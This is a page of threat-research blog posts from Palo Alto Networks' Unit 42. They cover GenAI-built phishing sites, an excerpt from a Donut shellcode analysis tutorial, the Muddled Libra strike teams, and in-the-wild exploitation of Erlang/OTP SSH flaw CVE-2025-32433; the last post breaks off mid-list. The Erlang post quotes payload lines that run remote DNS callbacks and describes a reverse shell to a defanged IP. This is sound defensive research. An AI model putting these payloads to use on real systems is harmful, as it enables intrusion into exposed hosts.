Page 8 – Unit 42

Fashionable Phishing Bait: GenAI on the Hook

Posted on August 19, 2025August 15, 2025 by Samantha Stallings

Executive Summary

The rapid expansion of generative AI (GenAI) has led to a diverse set of web-based platforms offering capabilities such as code assistance, natural language generation, chatbot interaction and automated website creation. This article uses insights from our telemetry to show trends in how the GenAI web is evolving.

Because of its growing prevalence, GenAI also opens new vectors for threat actors to misuse. Adversaries are increasingly leveraging GenAI platforms to create realistic phishing content, clone trusted brands and automate large-scale deployment using services like low-code site builders. The threats are getting harder to detect.

We examine specific misuse scenarios including AI-generated phishing pages and malicious chatbots. We also provide indicators of these activities to support detection and response efforts.

Palo Alto Networks customers are better protected from the threats described in this article by the following products and services:

Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics	GenAI, Phishing

Increase in the Use of GenAI

Introduction to Web-Based AI Services

GenAI has fueled a surge of new websites and platforms, from conversational assistants to multi-media creation tools. As the ecosystem evolves, we identify emerging patterns in how people are adopting different categories of AI services.

Writing assistants, meeting tools, code generators and website builders are streamlining tasks that previously demanded substantial manual effort, signaling a shift in how work is created and delivered across domains.These AI tools streamline workflows, reduce manual effort and enable new forms of content creation.

We are observing a significant upward trend in GenAI adoption across industries, particularly following the surge of public interest and innovation in the AI space. Within just six months, AI use has more than doubled and continues to grow steadily, as shown in Figure 1.

The blue line represents the number of AI website visits in billions, from April 2024-April 2025. The red bars indicate the number of new websites hosting AI services detected in millions. This overall trend of increased traffic to AI websites indicates a growing adoption of GenAI applications and services.

Figure 1. Month-over-month trends in AI website traffic and growth from April 2024 to April 2025.

AI Service Trends and Industry Focus

We discuss how people are adopting AI-specific capabilities so we can better predict how those various functions can introduce new risks. A further review of our telemetry reveals:

The top industries leading AI adoption include:
- High tech
- Education
- Telecommunications
- Professional and legal services
The high tech sector dominates AI use, accounting for over 70% of total GenAI tool use shown in Figure 2
Most of this activity is concentrated in text-generation applications (such as writing assistants and AI chatbots) and media-generation tools, as shown in Figure 3
About 16% of AI service use is dedicated to data processing and workflow automation, such as email campaign generation

Figure 3. Distribution of AI categories across all industries.

Overview of Phishing Attacks Misusing Various Types of AI Services

While GenAI tools offer powerful capabilities, they also introduce significant risks that threat actors can exploit for phishing and other types of cyberattacks.

AI code assistants can significantly enhance software development. They provide real-time coding suggestions, automate code generation and can reduce errors. However, they can inadvertently expose proprietary code or sensitive intellectual property, creating entry points for targeted attacks.
Text generation tools — such as conversational, writing and meeting assistants — can enhance productivity, content creation and customer interaction. However, attackers can manipulate them to generate convincing phishing content, spread misinformation or leak confidential data.
AI model services simplify deployment, training and inference. However, they can expose sensitive models or data to unauthorized access. This increases the risk of model hijacking or misuse in malicious workflows.
Attackers can use multi-media AI tools — including media generators and website builders — to rapidly create realistic-looking but fraudulent websites, deepfake content and deceptive phishing pages to mimic trusted brands.
AI-powered data platforms and workflow automation tools optimize business processes, improve efficiency and support informed decision-making. When loosely governed, they can become vectors for data leakage, unauthorized access and automated exploitation across integrated systems.

Collectively, these risks underscore the potential of GenAI to amplify phishing campaigns and other social engineering threats. Therefore, stronger safeguards and threat detection are necessary.

Figure 4 shows the top three AI services misused for phishing include:

Website generators (approximately 40%)
Writing assistants (approximately 30%)
Chatbots (almost 11%)

Figure 4. Distribution of categories of AI services misused for phishing attacks.

Misuse of Website Generation Services

Although these services are relatively new, attackers are already misusing AI-powered website builders for real-world phishing attacks.

We observed phishing websites that threat actors created using a popular AI-powered website builder, which is capable of producing websites within seconds. This platform allows someone to enter a prompt that can build and publish websites without any email or phone verification. The site uses AI to generate images and text based on this prompt, for creating a website.

We detected two real-world examples of AI-generated phishing landing pages in May 2025. Both of these phishing pages, shown in Figures 5 and 6, link to attacker-owned credential-stealing sites.

Promotional webpage featuring a "FREE COUPON" to unlock a 12-month Standard Plan at 100% off, with a button labeled 'Show Coupon Code' followed by another button that says 'Click here'. The background includes a blurred image of shapes in red and black. — Figure 5. Screenshot of the phishing page seen in May 2025.

Screenshot of a website's 'Gift Card' promotional page showing three blurred images of cards with text overlays that promote different shopping benefits. The navigation menu includes options for Home, About, Products, and Contact. — Figure 6. Screenshot of the phishing page seen in May 2025.

Some of the AI-assisted website builders we investigated appear to lack guardrails that would prevent someone from impersonating an existing business or organization. As a test, we used a known AI-assisted website builder to create a fake page to appear as if it’s for Palo Alto Networks.

The website builder only required a valid email address (not necessarily a Palo Alto Networks email address) to establish a trial account and publish a page impersonating our company. Since these pages are intended to quickly establish a web presence for a new company or organization, they lack the design elements that criminals would otherwise use to spoof a targeted brand.

In our test, the website builder promised to generate a free AI website in 60 seconds, which is an accurate statement. Our only input was a brief description of the company for an initial text prompt. Figure 7 shows a brief description of Palo Alto Networks we typed in the initial prompt before clicking on the “Enhance Prompt” button.

Website builder using AI. Generate a free AI website in 60 seconds. Below is a prompt window with the input "Palo Alto Networks is a leading cybersecurity company that has next generation firewalls and other security solutions. A giant cursor is about to select the Enhance Prompt button. — Figure 7. A brief description of our company in a prompt from the AI-assisted website builder.

The Enhance Prompt button took our initial input and created a complete AI prompt for the page, as shown below in Figure 8. The finished prompt included an AI-generated paragraph about the company, a default design style that can easily be modified and a list of content to include on the site.

Screenshot of a webpage with text describing Palo Alto Networks' commitment to innovation and cybersecurity, featuring a section on business/project name alongside company's mission and services. Cursor is hovering over the up arrow on the right. — Figure 8. The enhanced prompt from the AI-assisted website builder.

We then clicked on the arrow button noted in Figure 8, and the builder took approximately 5-10 seconds to create a staging environment for the site. From a hastily typed initial prompt of “Palo Alto Networks is a leading cybersecurity company that has next-generation firewalls and other security solutions,” the resulting page Figure 9 shows looks plausible for a cybersecurity company.

A professional at a workstation with multiple screens displaying data, on the fake and AI-generated Palo Alto Networks website, with text that reads "Cybersecurity redefined - Protect your assets with confidence" and a "View Services" button. — Figure 9. Index page generated by the AI-assisted website builder.

Scrolling through the index page generated by the site builder, we found a convincing AI-generated description of our company, as shown in Figure 10.

Fake AI-generated homepage of Palo Alto Networks website featuring a professional in front of digital screens, with text about leading cybersecurity solutions. — Figure 10. Company description in a page generated by the AI-assisted website builder.

The index page included links to different pages that contain descriptions of next-generation firewalls, cloud security solutions and threat intelligence services. Figure 11 shows a link from the index page for threat intelligence services and the resulting page from that link. Like the company description, the description of these services mimics what most people would expect from an established cybersecurity company.

Screenshot collage of fake AI-generated Palo Alto Networks website featuring sections on cloud security, threat intelligence, and advanced threat protection services with images of network security operations and descriptive text about cybersecurity solutions. — Figure 11. Threat intelligence services page generated by the AI-assisted website builder.

The website builder includes a button to publish the site. Pushing this button generated the dialogue window shown in Figure 12.

A screenshot of a website editor interface from the fake AI-generated Palo Alto Networks, showing a pop-up window titled "Publish website." The pop-up prompts the user to add a custom domain with pricing information and subscription plans. Buttons for "View plans," "Cancel," and "Publish" are visible. — Figure 12. Dialogue window to publish the site from our test.

While we did not publish this fake Palo Alto Networks site, cybercriminals have misused this builder to publish phishing pages mimicking other brands, such as the two real-world examples we previously referenced.

Attackers can replicate similar attack vectors on other website builder platforms since many of these platforms have recently added AI-assisted features. Figure 13 shows an example of a fake gift card site spoofing popular vendors created through a popular website builder.

Promotional website banner for gift card scam website saying 'Joy in Every Card' featuring the 'Explore' button and an image of a hand holding a glowing card. Below are displayed various card offerings including Store Credit, Discount Voucher, Gift Card, and Subscription Credit with listed prices. — Figure 13. Webpage for discounted gift cards generated on another popular AI-powered website builder.

Currently, the real-world phishing attacks seen on AI-powered website builders appear relatively rudimentary and might not deceive most potential victims. However, in the medium to long term, we expect that these attacks will become more convincing as AI-powered website builders grow more powerful.

Misuse of Writing Assistant Services

In addition to website builders, we identified multiple real-world phishing URLs generated and hosted on third-party AI writing assistant platforms. In all these cases, the attacker used the app to host a phishing page. The phishing page displays a generic message like “You have new documents — click the button to view.” Clicking the button leads the victim to a secondary credential-stealing site, such as a fake Microsoft login page.

Despite being hosted on platforms that offer AI-powered content generation, these phishing pages are quite simple and show no clear signs of AI involvement (see Figures 14 and 15). This type of activity is similar to what we’ve seen in software as service (SaaS) platform misuse campaigns, such as phishing pages hosted on presentation builders or other legitimate content-sharing tools.

Screenshot of a digital document sharing interface titled "SECURE BUSINESS DOCUMENTS. Features include a link to "VIEW PDF ONLINE" and additional sections for login, author details, and an activation reminder for Windows. — Figure 14. Screenshot of a phishing page created on an SEO assistant platform.

Screenshot of document sharing service with a PDF document ready to be shared. There is a button labeled "VIEW DOCUMENT," followed by a signature from someone purported to be "Kim Cromidas" with some information redacted for security reasons. — Figure 15. Screenshot of the phishing page created on a sales assistant platform.

While attackers might leverage the AI functionality of these platforms in more powerful ways in the future, they are currently using these platforms primarily as a hosting service for malicious content.

Conclusion

In this article, we discussed web-based GenAI services and reviewed phishing attacks that misused them. We investigated examples of phishing pages from AI-powered website builders, and explored how criminals can use these builders to create phishing content more easily. Criminals have also misused AI-powered writing assistant services, but these platforms have been used primarily as a hosting service for malicious content with no clear signs of AI involvement.

Our telemetry reflects the growing adoption of GenAI applications and services, and we expect a corresponding increase in attacks that take advantage of GenAI as time passes.

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products:

Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
UK: +44.20.3743.3660
Europe and Middle East: +31.20.299.3130
Asia: +65.6983.8730
Japan: +81.50.1790.0200
Australia: +61.2.4062.7950
India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Acknowledgments

Thanks to Peng Peng for his research into malicious chatbots, as well as Alex Starov and Jun Javier Wang for their suggestions.

Appendix

Additional screenshots of GenAI-related phishing pages we found in the wild are shown in Figures 16-22.

Website header displaying a "Free Coupon" banner, featuring images of a wooden table with European currency notes beside a box with pine cones, with text encouraging to "Unlock your savings today!" — Figure 16. An additional screenshot of the phishing site from Figure 5.

Background of densely arranged pages, possibly documents or forms, with an overlay text saying "SECURE DOCUMENT" and a button labeled "VIEW DOCUMENT". — Figure 17. Screenshot of a phishing page hosted on an AI-powered website platform initially sent via a phishing email. This webpage links to a fake login page for a popular web-based service.

Collage of six images depicting various technology and lifestyle products on sale. The prices range from $1 to $20. — Figure 18. Spoofed gift card shopping page generated on a website builder.

A notification on a computer screen displaying a message titled "New Completed PDF Document Received." The email informs the recipient of a new PDF document ready for review and includes a red "Review Completed Documents" button. — Figure 19. Screenshot of a phishing page generated using an AI-powered design assistant site.

Phishing page screenshot showing a car, TVs, and other items with a KLIK CEK KUPON button. — Figure 21. Screenshot of a landing phishing page generated on a no-code app builder.

Phishing page screenshot showing a message that reads "You Have 2 New Fax Documents" with an option to "Get Your Files Here." The format is PDF and the status is delivered. The interface includes colorful icons and buttons. — Figure 22. Screenshot of a phishing page generated on an AI-powered educational platform.

A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode

Posted on August 14, 2025August 25, 2025 by Samantha Stallings

Executive Summary

We created an in-depth malware analysis tutorial featuring shellcode generated by a tool named Donut. The tutorial walks through a single infection chain from end to end, starting with a sample, and assuming no prior knowledge of the malware in question.

By the end of the tutorial, readers will better understand many components of the infection chain and identify the family of the final payload. The tutorial is designed to be a beginner-friendly lesson for those who understand the basics of malware analysis but have yet to analyze many samples in the wild on their own.

With the help of this tutorial, we hope that readers will:

Become familiar with common malware analysis tools like dnSpy, IDA Pro, x64dbg and ProcessHacker
Learn how to leverage both static and dynamic analysis to form a complete picture of malware behavior
Recognize common techniques used by malware in its natural context, such as:
- Dynamic API resolution
- Process injection
- Bypassing AMSI by using memory patching
Gain insight on how malware analysts at Palo Alto Networks might approach an unknown sample in their daily operations

The infection chain in this tutorial is composed of different stages, each playing a different role. These stages include downloading the initial malware, hiding traces of malicious activity and dropping the final payload.

Along the way, we record every step in our analysis, and we explain our thought process behind each decision. We explain not only what the malware sample is doing, but also the reasons why a malware sample might do the observed activity.

Due to the large size of the tutorial, we have included a small excerpt in this article as a preview. To read the tutorial in its entirety, please view it on our GitHub page.

Palo Alto Networks customers are better protected from the malware reviewed in this tutorial through the following products and services:

Cortex XDR and XSIAM
Our Next-Generation Firewall with Cloud-Delivered Security Services, including

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics	Shellcode, Static Analysis

Excerpt of Donut Malware Analysis Tutorial

This excerpt features the analysis of an unknown function in the Donut-generated shellcode used during the attack chain. The analysis helps explain some basic techniques using IDA Pro as a disassembler and decompiler and x64dbg as a debugger.

The screenshot below shows the decompiled shellcode in IDA Pro. The unknown function is sub_10A31A, highlighted in a red box in Figure 1. This unknown function does not take any arguments.

Screenshot of computer code in an IDE, highlighting function definitions and calls, with specific lines marked in red to indicate errors or warnings. — Figure 1. Decompiled shellcode viewed in IDA Pro.

Using x64dbg as a debugger for this shellcode, we can view the content of the EAX register from the sub_10A31A function. The EAX register merely returns the address of the function, which is 06CDA31 as Figure 2 shows.

Figure 2. The return value of sub_10A31A.

Figure 3 below shows the decompiled code of the sub_10A31A function.

Screenshot of a simple C programming code involving a function. The function is defined to return an integer and involves pointer operations. — Figure 3. The decompiled code of sub_10A31A.

This function is extremely simple because it just returns the address of the function, so it matches what we just observed in x64dbg. But what is the purpose of returning the address of the function? Let’s return to the debugger to find some clues.

Stepping through the shellcode in x64dbg, the Extended Instruction Pointer (EIP) is on the first instruction, call 6CDA31A as shown below in Figure 4. The operand of the call instruction, 6CDA31A, is the address of the sub_10A31A function.

Screenshot of a computer debug screen highlighting code operations with assembly language, including call and mov instructions, and memory addresses in hexadecimal notation. The first line is highlighted. — Figure 4. The call to sub_10A31A as shown in x64dbg.

This function calls the instructions starting at 0x06CDA31A. Figure 5 below shows these instructions.

Screenshot of a segment of computer code, highlighting various operations and memory addresses in different colors. — Figure 5. Instructions at 0x06CDA31A shown in x64dbg.

We can find the same instructions for this function by viewing the shellcode in IDA. However, IDA shows the same instruction as call $+5 in the disassembled code as Figure 6 below shows, in the red box.

Screenshot of computer code in an IDE, highlighting a subroutine call at an address with 'call' command in red text. — Figure 6. The assembly instructions of sub_10A31A in IDA.

Let’s break down the call $+5 instruction shown in IDA:

$+5 just means “the current address (EIP) plus 5.” With a value of E8 00 00 00 00, the full call instruction is 5 bytes, so $+5 effectively refers to the instruction immediately after the call instruction (i.e., the address of the pop eax instruction).
call pushes the return address (i.e., the address right after the call instruction) onto the stack and jumps to the operand of the call instruction.

Putting these two facts together, call $+5 means “push the address immediately after the call instruction onto the stack and then jump to that address.”

This might seem like a very roundabout way of pushing the address of the next instruction onto the stack, but the x86 instruction set does not provide a more straightforward way of doing so. An instruction like push eip+5 is not valid, as EIP cannot be used directly as an operand.

Let’s turn our attention back to the debugger to observe this in action. The instruction call 6CDA31F pushes 0x06CDA31F onto the stack and then jumps to 0x6CDA31F as shown in Figure 7.

Image showing a computer screen with hexadecimal code and arrow indicators highlighting specific segments of the code in different colors. — Figure 7. The operand of the call instruction is also the address of the next instruction.

Now that 0x06CDA31F is on the stack, it gets stored in the EAX register with the pop eax instruction as shown in Figure 8.

Figure 8. EAX after the pop eax instruction.

And then we subtract 5 from 0x06CDA31F with the sub eax, 5 instruction as shown in Figure 9.

Figure 9. EAX after the sub eax, 5 instruction.

As we observed when we first stepped over sub_10A31A, the result is that 0x06CDA31A gets stored in EAX.

The sequence of instructions inside sub_10A31A is commonly used to implement PC-relative addressing and allows the shellcode to be position-independent. Why is this important? Just like any program, malware may have some resources that it needs to access.

Resources can be accessed via absolute addresses or an offset relative to a base address. Regular PE files can access resources using absolute addresses because the PE loader applies relocation adjustments if the program is loaded into a memory region different from its preferred base address. However, shellcode doesn’t have this capability and thus must rely on relative addresses.

By calling sub_10A31A, the shellcode can access the resources it needs by using an offset relative to the address of sub_10A31A in memory. We can then look at the decompiled code in Figure 10 to see how it’s used. The address returned by sub_10A31A (which we’ll now call get_pc) is used in the second argument of memcpy to access the address of the source buffer.

Screenshot of computer code in an IDE, featuring functions and parameters highlighted in red and blue. — Figure 10. The decompiled code after renaming sub_10A31A.

Conclusion

Analyzing malware is a very detailed and complex process. Through the full tutorial, we hope to help others improve their skills in malware analysis through a step-by-step analysis of an infection chain.

If you found this excerpt interesting, please read the full tutorial. Happy analyzing!

Palo Alto Networks customers are better protected from the shellcode discussed in this article through the following products:

The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research.
Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
UK: +44.20.3743.3660
Europe and Middle East: +31.20.299.3130
Asia: +65.6983.8730
Japan: +81.50.1790.0200
Australia: +61.2.4062.7950
India: 00080005045107

Indicators of Compromise

SHA256 hash: d2bea59a4fc304fa0249321ccc0667f595f0cfac64fd0d7ac09b297465cda0c4
File size: 1,092,149 bytes
File type: Data
File description: Decrypted Donut-generated shellcode

Additional Resources

Donut - Injecting .NET Assemblies as Shellcode – The Wover
Analysis of Native Process CLR Hosting Used by AgentTesla – SonicWall
Bypassing Enterprise EDR to Inject .NET Assemblies Into Remote Processes – MacoSec

Muddled Libra’s Strike Teams: Amalgamated Evil

Posted on August 12, 2025August 28, 2025 by Ria Bhatia

Many From One

It’s disingenuous to consider Muddled Libra like a traditional monolithic attack group, one with defined structure and clear lines of leadership. Muddled Libra, Scattered Spider, Octo Tempest or any of the many other names the group is labeled with is not an organized entity but a loose collaboration of like-minded cybercriminals, or personas, with common interests tethered by social chat applications.

Interrelated Strike Teams

Muddled Libra personas converge into strike teams, each with their own unique skillsets, tradecraft and objectives in tow. Since late 2022, Unit 42 has tracked at least seven distinct teams. Though in reality distinction means very little as personas enter, exit and flow from team to team. Instead, what defines a team is the combination of what they're after and the unique ways in which they go after it.

While the fluidity of this model complicates tracking, it also creates unique opportunities for threat researchers. Unlike the homogeneous, mostly faceless operations of traditional cybercrime groups, members of these small teams inherently leave their fingerprints on each attack; distinct fingerprints that become signature tradecraft.

Over time successful tradecraft is shared, learned and incorporated by other personas into their own fingerprints. By studying incident response engagements, threat intelligence researchers can walk this development back and begin profiling personas and their interdependent relationships. This allows the creation of predictive models, ultimately leading to effective controls and mitigations against future attacks.

Theory in Practice

In the teams we track related to this attack cluster, we find patterns not only in tradecraft but also objective. That is not to say these teams’ tradecraft and objectives remain static, but that they tend to evolve in a predictable way that indicates relatively consistent and known personas.

Most early teams were hyper-focused on cryptocurrency theft and have never wavered, while others started out with cryptocurrency in mind but shifted to less complex and more volume-friendly objectives. The supply chain for the cryptocurrency industry is far-reaching and includes business process outsourcing, mass marketing, telecommunications, authentication providers and many other verticals. Many organizations in these industries have essentially been collateral damage along the way as strike teams identified and hunted cryptocurrency “whales” – large, valuable targets.

With each success, teams have learned, matured and multiplied. New personas enter the fray and others are arrested or fade away. Attack teams have expanded far from cryptocurrency and into a staggering breadth of industries.

There are strike teams focused on stealing unique intellectual property for bragging rights that have targeted media and software development firms.
Extortion-oriented teams use common ransomware-as-a-service affiliate playbooks with widespread asset destruction and encryption. These teams typically target organizations in high-availability verticals like retail and entertainment.
Some teams simply aim to harvest credentials directly from consumers that can be quickly flipped on the dark web; low-complexity attacks like these frequently target individuals.
A few teams are engaging in mass information harvesting. Valuable personal data is stolen that can later be stitched together to invasively profile high-value targets. Attackers focus on organizations that have unique and highly private data like those in the financial, retail and transportation industries.

Bar chart displaying the industry distribution within seven teams, with industries labeled as Telecommunications, SaaS, Retail, Media, Marketing, Hospitality, Government, Gambling, Finance, and Business Process Outsourcing. Each team's bar is segmented by color to represent different industries. — Figure 1. Seven teams associated with Muddled Libra and the differences in their targeting.

The fluid nature of Muddled Libra attack teams make it a fool’s errand to predict what industry will be targeted next. Instead, defenders should focus on what they have that the group is likely to be after and who might be impacted.

For example, consider data theft or direct extortion and work backward from there. If your organization has troves of personal data, take a deep look at how to classify and protect it appropriately based on its value. Restrictive access control, data retention policies, data loss prevention and segmentation all go a long way toward ensuring your data is not used as a weapon against you.

Extortionists typically threaten to leak stolen data, disrupt critical business operations, or both. Effective business continuity and disaster recovery planning can help shield key business assets from destruction or ransomware.

If your organization is consumer facing, consider how you can better authenticate your customers and protect them from having their credentials compromised and used against them.

Strike teams will continue to form, developing new techniques and branching into new industries. Don’t lose sight of the forest (a broader goal of a robust security program based on risk and defense-in-depth strategies) for the sake of analyzing the trees (the specific tactics, techniques and procedures or targets currently popular with individual Muddled Libra strike teams).

If your organization could benefit from assistance evaluating your readiness, consider reaching out for a Cyber Risk Assessment or other proactive services from Unit 42.

Updated on Aug. 28, 2025, at 2:34 p.m. PT to add missing data to Figure 1.

Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild

Posted on August 11, 2025August 13, 2025 by Cecilia Hu

Executive Summary

This article presents our observations of exploit attempts targeting CVE-2025-32433. This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language's Open Telecom Platform (OTP).

Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks.With a CVSS score of 10.0, CVE-2025-32433 enables unauthenticated clients to execute commands by sending SSH connection protocol messages (codes >= 80) to open SSH ports, which should only be processed after successful authentication. Vulnerable versions include Erlang/OTP prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20.

A patch is available in Erlang/OTP versions OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20 and later.

We have reproduced, validated and analyzed this vulnerability to better understand its impact and provide detection strategies. We observed a significant increase in exploitation activity targeting this vulnerability from May 1-9, 2025, with 70% of our detections originating from firewalls protecting global operational technology (OT) networks.

This analysis includes telemetry data showing geographic distribution and trends as well as the industries affected by this vulnerability.

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products and services:

Cortex XDR and XSIAM
Cortex Xpanse
Next-Generation Firewall with the Advanced Threat Prevention subscription

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Vulnerabilities Discussed	CVE-2025-32433

Details of the Vulnerability

Erlang is a programming language designed for building concurrent systems where multiple connections are needed simultaneously. Its companion framework, the Open Telecom Platform (OTP), has long been trusted in critical infrastructure from telecommunications networks to financial systems.

OT and 5G environments use Erlang/OTP due to its fault-tolerance and scalability for high availability systems with minimal downtime. Due to compliance and safety requirements, OT and 5G administrators tend to use Erlang/OTP's native SSH implementation to remotely manage hosts, which makes CVE-2025-32433 a particular concern in these types of networks.

At the heart of Erlang/OTP’s secure communication capabilities lies its native SSH implementation — responsible for encrypted connections, file transfers and most importantly, command execution. A flaw in this implementation would allow an attacker with network access to execute arbitrary code on vulnerable systems without requiring credentials, presenting a direct and severe risk to exposed assets.

Analyzing global internet scanning data from Cortex Xpanse in April 2025, we saw vulnerable Erlang/OTP SSH services were widely exposed on the internet using different TCP ports. This included TCP port 2222, which is commonly used for communications with older industrial automation components and sometimes used by the Ethernet/IP implicit messaging protocol.

CVE-2025-32433 is inferred from SSH versions tied to Erlang/OTP releases. This widespread exposure on industrial-specific ports indicates a significant global attack surface across OT networks. Analysis of affected industries demonstrates variance in the attacks.

In our telemetry, we saw that the following industries were disproportionately affected, with over 85% of exploit attempts being triggered directly on their OT firewalls:

Healthcare
Agriculture
Media and entertainment
High technology

Despite high OT reliance, utilities and energy, mining, and aerospace and defense showed no direct OT triggers for this specific threat.

Sectors like professional and legal services primarily saw triggers on their IT networks. Industries such as manufacturing, wholesale and retail, and financial services experienced more balanced detection across both IT and OT, necessitating integrated defenses.

Scope of Exploitation Attempts Targeting CVE-2025-32433

Our telemetry confirms active exploitation attempts of CVE-2025-32433. Our sensors have detected exploit attempts targeting this vulnerability across multiple industries, with the earliest observation occurring on May 1, 2025.

We identified several malicious payloads being delivered through CVE-2025-32433 exploit attempts. A commonly observed technique uses reverse shells to gain unauthorized remote access. Two examples seen in the wild include the following payloads.

Payload 1

File descriptors are used to create a TCP connection and bind it to a shell, allowing interactive command execution over the network, as shown in Figure 1.

Screenshot of a TCP steam with network address and port details visible. — Figure 1. TCP connection creation.

Payload 2

Figure 2 shows a simpler variant that initiates a reverse shell using Bash's interactive mode and redirects the shell's input and output directly to a remote host at 146.103.40[.]203:6667. This port is commonly associated with remote control servers used for botnet communications.

Threat Infrastructure Insights

Our investigation into DNS telemetry was driven by DNS-based indicators we discovered during our payload analysis of exploitation attempts targeting CVE-2025-32433. Several payloads contained commands attempting DNS lookups of long, randomly generated subdomains under dns.outbound.watchtowr[.]com:

execSinet:gethostbyname("d0am3pi3pgl6h3t9mkp0qt3zn9p1izwso.dns.outbound.watchtowr[.]com").Zsession
execSinet:gethostbyname("d0a3qn23pglekp6ckgtge8xxfd14a8ouk.dns.outbound.watchtowr[.]com").Zsession
execSinet:gethostbyname("d09idt23pgl3db0en3dgeam6i45tpc6bg.dns.outbound.watchtowr[.]com").Zsession

These payloads also provide clear signs of Out-of-Band Application Security Testing (OAST). Specifically, DNS lookups to randomized subdomains under dns.outbound.watchtowr[.]com were triggered using gethostbyname() calls — a common tactic in blind RCE or exfiltration testing.

These payloads are designed not to return results directly, but to validate execution via external DNS resolutions that the attacker monitors. This approach is widely used in stealthy campaigns, red team assessments and automated scanning frameworks.

Scope of the Activity

We conducted a multi-source analysis to understand how attackers attempt exploitation of CVE-2025-32433 in real-world environments. This analysis highlights the geographic distribution of vulnerable systems, exploit activity across key industry sectors and evolving trends over time.

Exposure Surface Analysis

Cortex Xpanse revealed 275 distinct hosts and 326 distinct Erlang/OTP services that were publicly routable on the internet between April 16 and May 9, 2025. The countries observed to host the most Erlang/OTP servers are the U.S., Brazil and France.

Cortex Xpanse scans showed that Erlang/OTP services are widely exposed and vulnerable on industrial networks. Figure 3 below shows the services found on TCP ports like 830, 2022 and 22.

Bar chart showing the distribution of observed Erlang/OTP server ports and their exposure status labeled as 'Vulnerable' or 'Not Vulnerable' in Cortex XPANSE. The columns included on the right detail the port numbers, SSH version, if they are vulnerable, and the number of hosts. — Figure 3. Port and vulnerability exposure of Erlang/OTP services.

The group of exposed ports includes TCP port 2222. This port is also sometimes used by Ethernet/IP implicit messaging, highlighting a direct bridge between IT-centric software vulnerabilities and the operational heart of industrial control systems.

This overlap highlights the following:

Attack surface convergence
The blurred boundary between IT and OT systems, where a software vulnerability in an IT-facing protocol such as Erlang/OTP, could share network space — or even ports — with industrial control system traffic.
Increased exploitability
Attackers scanning for exploitable Erlang/OTP services could inadvertently or intentionally interact with exposed industrial control systems (ICS) devices, creating opportunities for pivoting into OT environments, especially where network segmentation is weak.

Geographic Distribution of Exploit Attempts

After the vulnerability was published on April 16, 2025, we began to detect exploit attempts from a few countries, as shown below in Figures 4 and 5. Figure 4 represents the total number of CVE-2025-32433 signatures triggered by all firewalls in a given country. Figure 5 represents signature triggers specifically from firewalls identified as being within OT networks.

Heat map showing various countries colored in shades of teal to red, representing data with a scale from 1 to 2,693. Low instances are teal and high instances are red. The United States is entirely red. The only country with slight variation is Japan. — Figure 4. All network victim geolocation.

Heat map highlighting countries in varying shades of blue and red, indicating different data values ranging from 1 to 1,916. The Unite States is entirely red. — Figure 5. OT network victim geolocation.

Out of a total of 3,376 CVE-2025-32433 signatures triggered globally, 2,363 (approximately 70%) originated from firewalls protecting OT networks. While the figures might appear the same, South America and Scandinavia showed minimal or no OT-related exploit activity despite broader exploitation elsewhere — indicating either better segmentation, slower adoption of vulnerable stacks or detection gaps.

Countries With High OT Correlation:

Japan: 99.74% of its CVE-2025-32433 signatures originated from OT networks
U.S.: Despite a lower percentage (71.15%) compared to Japan, the volume of signatures in the U.S. (1916 within OT) signifies a great number of potential incidents affecting American industrial systems
The Netherlands, Ireland, Brazil and Ecuador: For these countries, 100% of observed CVE-2025-32433 signature triggers occurred within OT environments
France: This country had a significant OT impact at 66.67% of observed signature triggers

The disproportionate volume of CVE-2025-32433 exploit attempts observed in OT networks across countries like Japan, the U.S. and others reflects a combination of factors, not a singular cause.

These regions often host highly connected, digitally mature industrial sectors that rely on complex IT/OT integrations where general-purpose components like Erlang/OTP could be embedded in operational environments.

Exploit Distribution by Industry

Almost 70% of the total number of signature triggers originated from firewalls protecting OT networks. Of the total number of firewalls that saw an exploit attempt, nearly 60% of the attempts were on firewalls within OT networks. Averaging out the number of exploit attempts per firewall, OT networks saw 160% more attempts per device than non-OT networks.

This indicates:

A significant number of OT firewalls are exposed to the internet
Adversaries might have already breached edge security, compromised enterprise devices and established persistence
- They could be launching this exploit attempt from within enterprise networks using lateral movement techniques, with the goal of accessing OT networks
Discrepancy in exploit attempts on OT networks could indicate the intention of malicious actors to infiltrate critical infrastructure

This number could be anomalous because of the small sample size analyzed.

An outsized majority of triggers originated in the education industry, both within all networks and OT networks, with 2,460 (72.7% of total) and 2,090 (88.4% of total) respectively, shown in Figure 6 below.

Bar chart comparing the number of incidents in two categories, "All Industries" and "OT Industries", split into "Education" and "Remaining". "Education" incidents are significantly higher in "All Industries" compared to "OT Industries". — Figure 6. CVE triggers by industry.

The industry-level distribution of CVE-2025-32433 exploitation attempts underscores a critical shift in the operational threat landscape.

We observed nearly 70% of exploit attempts within OT networks. Several sectors — including healthcare, high technology and education — showed a disproportionately high concentration of OT-specific activity.

This challenges the traditional view that OT risk is confined to industrial control systems or manufacturing. At the same time, we should not interpret the absence of detections in the following OT-heavy sectors as safety:

Utilities and energy
